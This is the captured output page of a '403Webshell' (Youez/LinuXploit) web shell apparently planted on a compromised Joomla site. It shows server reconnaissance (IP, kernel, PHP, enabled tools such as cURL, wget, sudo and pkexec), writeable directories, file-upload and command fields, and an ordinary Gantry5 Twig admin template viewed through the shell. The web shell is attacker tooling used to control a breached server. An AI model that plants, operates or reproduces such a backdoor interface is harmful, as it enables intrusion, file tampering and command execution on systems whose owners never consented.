403Webshell
Server IP : 104.21.84.107  /  Your IP : 104.23.197.209
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.4.5
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/fcs/administrator/components/com_gantry5/templates/modals/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/fcs/administrator/components/com_gantry5/templates/modals/atom.html.twig
{% extends ajax-suffix ? "@gantry-admin/partials/ajax.html.twig" : "@gantry-admin/partials/base.html.twig" %}

{% block gantry %}
    <form method="post"
          action="{{ gantry.route(action) }}"
          data-g-inheritance-settings="{{ {'id': item.id, 'type': 'atom', subtype: item.type}|json_encode|e('html_attr') }}"
    >
        <input type="hidden" name="id" value="{{ item.id }}" />
        <div class="g-tabs" role="tablist">
            <ul>
                {# Settings Tab #}
                <li class="active">
                    <a href="#" id="g-settings-atom-tab" role="presentation" aria-controls="g-settings-atom" role="tab" aria-expanded="true">
                        {% if inheritable %}<i class="fa fa-fw fa-{{ (item.inherit and ('attributes' in item.inherit.include)) ? 'lock' : 'unlock' }}" aria-hidden="true"></i>{% endif %}
                        {% block title %}
                            {{ 'GANTRY5_PLATFORM_ATOM'|trans }}
                        {% endblock %}
                    </a>
                </li>
                {# Inheritance Tab #}
                {% if inheritance %}
                    <li>
                        <a href="#" id="g-settings-inheritance-tab" role="presentation" aria-controls="g-settings-inheritance" aria-expanded="false">
                            {{ 'GANTRY5_PLATFORM_INHERITANCE'|trans }}
                        </a>
                    </li>
                {% endif %}
            </ul>
        </div>

        <div class="g-panes">
            {# Settings Pane #}
            <div class="g-pane active" role="tabpanel" id="g-settings-atom" aria-labelledby="g-settings-atom-tab" aria-expanded="true">
                {% include '@gantry-admin/pages/configurations/layouts/particle-card.html.twig' with {
                item: item,
                title: item.title,
                blueprints: blueprints.form,
                overrideable: overrideable and (blueprints.form.overrideable is not defined or blueprints.form.overrideable),
                inherit: 'attributes' in item.inherit.include and item.inherit.outline in inheritance.form.fields.outline.filter ? item.inherit.outline : null
                } %}
            </div>

            {# Inheritance Pane #}
            {% if inheritance %}
                <div class="g-pane" role="tabpanel" id="g-settings-inheritance" aria-labelledby="g-settings-inheritance-tab" aria-expanded="false">
                    <div class="card settings-block">
                        <h4>
                            {{ 'GANTRY5_PLATFORM_INHERITANCE'|trans }}
                        </h4>
                        <div class="inner-params">
                            {% include 'forms/fields.html.twig' with {
                            gantry: gantry,
                            blueprints: inheritance.form,
                            data: {inherit: item.inherit},
                            prefix: 'inherit.'
                            } only %}
                        </div>
                    </div>
                </div>
            {% endif %}
        </div>

        <div class="g-modal-actions">
            <button class="button button-primary" type="submit">{{ 'GANTRY5_PLATFORM_APPLY'|trans }}</button>
            <button class="button button-primary" data-apply-and-save="">{{ 'GANTRY5_PLATFORM_APPLY_SAVE'|trans }}</button>
            <button class="button g5-dialog-close">{{ 'GANTRY5_PLATFORM_CANCEL'|trans }}</button>
        </div>
    </form>
{% endblock %}

Youez - 2016 - github.com/yon3zu
LinuXploit